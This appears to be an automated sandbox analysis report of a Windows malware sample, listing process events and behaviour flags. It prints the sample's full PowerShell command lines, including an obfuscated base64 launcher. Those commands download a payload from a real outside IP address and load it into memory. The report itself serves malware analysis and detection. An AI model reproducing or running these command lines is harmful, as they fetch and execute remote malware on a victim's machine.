Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt' ;$CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;Invoke-WebRequest -URI $CCRhm -OutFile $CYrJP -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ; } ;$xkllh = '0' ;$bpvrv = 'C:\Users\user\Desktop\sostener.vbs' ;[Byte[]] $mqons = [system.Convert]::FromBase64String( ( Get-Content -Path $CYrJP ).replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($mqons).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ( 'dAB4AHQALgB2AG8AbgA5ADEAcwBvAHMALwBzAGQAYQBvAGwAbgB3AG8AZAAvADkAMQBlAHIAYgBtAGUAaQB2AG8AbgAvAC0ALQA2ADcANQA0AHIAbwB0AGMAZQBoAC8AZwByAG8ALgB0AGUAawBjAHUAYgB0AGkAYgAvAC8AOgBzAHAAdAB0AGgA' , $bpvrv , '_____scs_______________________________________-------', $xkllh, '1', 'Roda' )) ;"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??Og?v?C8?OQ?x?C4?Mg?w?DI?Lg?y?DM?Mw?u?DE?Ng?5?C8?V?Bh?Gs?LwBS?GU?Zw?v?E0?YQBy?Ho?LwBE?FI?Rw?v?FI?V?BD?C8?QQBE?C8?Z?Bs?Gw?LgB0?Hg?d??n?C??Ow?k?EM?WQBy?Eo?U??g?D0?I??o?C??WwBT?Hk?cwB0?GU?bQ?u?Ek?Tw?u?F??YQB0?Gg?XQ?6?Do?RwBl?HQ?V?Bl?G0?c?BQ?GE?d?Bo?Cg?KQ?g?Cs?I??n?GQ?b?Bs?D??MQ?u?HQ?e?B0?Cc?I??p?C??OwBJ?G4?dgBv?Gs?ZQ?t?Fc?ZQBi?FI?ZQBx?HU?ZQBz?HQ?I??t?FU?UgBJ?C??J?BD?EM?UgBo?G0?I??t?E8?dQB0?EY?aQBs?GU?I??k?EM?WQBy?Eo?U??g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?I?Bw?G8?dwBl?HI?cwBo?GU?b?Bs?C4?ZQB4?GU?I??t?GM?bwBt?G0?YQBu?GQ?I?B7?C??J?BD?Fk?cgBK?F??I??9?C??K??g?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?C??KQ?g?Ds?J?Bn?Ec?aQBt?EE?I??9?C??K??g?Ec?ZQB0?C0?QwBv?G4?d?Bl?G4?d??g?C0?U?Bh?HQ?a??g?CQ?QwBZ?HI?SgBQ?C??KQ?g?Ds?I?B9?C??Ow?k?Hg?awBs?Gw?a??g?D0?I??n?D??Jw?g?Ds?J?Bi?H??dgBy?HY?I??9?C??Jw?l?Eo?awBR?GE?cwBE?GY?ZwBy?FQ?Zw?l?Cc?I??7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?bQBx?G8?bgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?I?BH?GU?d??t?EM?bwBu?HQ?ZQBu?HQ?I??t?F??YQB0?Gg?I??k?EM?WQBy?Eo?U??g?Ck?LgBy?GU?c?Bs?GE?YwBl?Cg?Jw?k?CQ?Jw?s?Cc?QQ?n?Ck?I??p?C??OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?G0?cQBv?G4?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?C??JwBk?EE?Qg?0?EE?S?BR?EE?T?Bn?EI?MgBB?Ec?O?BB?GI?ZwBB?DU?QQBE?EU?QQBj?Hc?QgB2?EE?S?BN?EE?T?B3?EI?egBB?Ec?UQBB?Fk?UQBC?HY?QQBH?Hc?QQBi?Gc?Qg?z?EE?Rw?4?EE?WgBB?EE?dgBB?EQ?awBB?E0?UQBC?Gw?QQBI?Ek?QQBZ?Gc?QgB0?EE?RwBV?EE?YQBR?EI?MgBB?Ec?O?BB?GI?ZwBB?HY?QQBD?D??QQBM?FE?QQ?y?EE?R?Bj?EE?TgBR?EE?M?BB?Eg?SQBB?GI?dwBC?D??QQBH?E0?QQBa?FE?QgBv?EE?Qw?4?EE?WgB3?EI?eQBB?Ec?O?BB?Ew?ZwBC?D??QQBH?FU?QQBh?Hc?QgBq?EE?S?BV?EE?WQBn?EI?M?BB?Ec?awBB?Fk?ZwBB?HY?QQBD?Dg?QQBP?Gc?QgB6?EE?S?BB?EE?Z?BB?EI?M?BB?Ec?ZwBB?Cc?I??s?C??J?Bi?H??dgBy?HY?I??s?C??JwBf?F8?XwBf?F8?cwBj?HM?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?Hg?awBs?Gw?a??s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?C??Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt' ;$CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;Invoke-WebRequest -URI $CCRhm -OutFile $CYrJP -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ; } ;$xkllh = '0' ;$bpvrv = 'C:\Users\user\Desktop\sostener.vbs' ;[Byte[]] $mqons = [system.Convert]::FromBase64String( ( Get-Content -Path $CYrJP ).replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($mqons).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ( 'dAB4AHQALgB2AG8AbgA5ADEAcwBvAHMALwBzAGQAYQBvAGwAbgB3AG8AZAAvADkAMQBlAHIAYgBtAGUAaQB2AG8AbgAvAC0ALQA2ADcANQA0AHIAbwB0AGMAZQBoAC8AZwByAG8ALgB0AGUAawBjAHUAYgB0AGkAYgAvAC8AOgBzAHAAdAB0AGgA' , $bpvrv , '_____scs_______________________________________-------', $xkllh, '1', 'Roda' )) ;"	Jump to behavior

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 15_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_00007FFAAC491D9F pushfd ; ret	13_2_00007FFAAC491FAA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_004567E0 push eax; ret	15_2_004567FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_0045B9DD push esi; ret	15_2_0045B9E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_00455EAF push ecx; ret	15_2_00455EC2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_00433FF6 push ecx; ret	15_2_00434009

Contains functionality to download and launch executables

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 15_2_00406128 ShellExecuteW,URLDownloadToFileW,

15_2_00406128

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 15_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Delayed program exit found

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
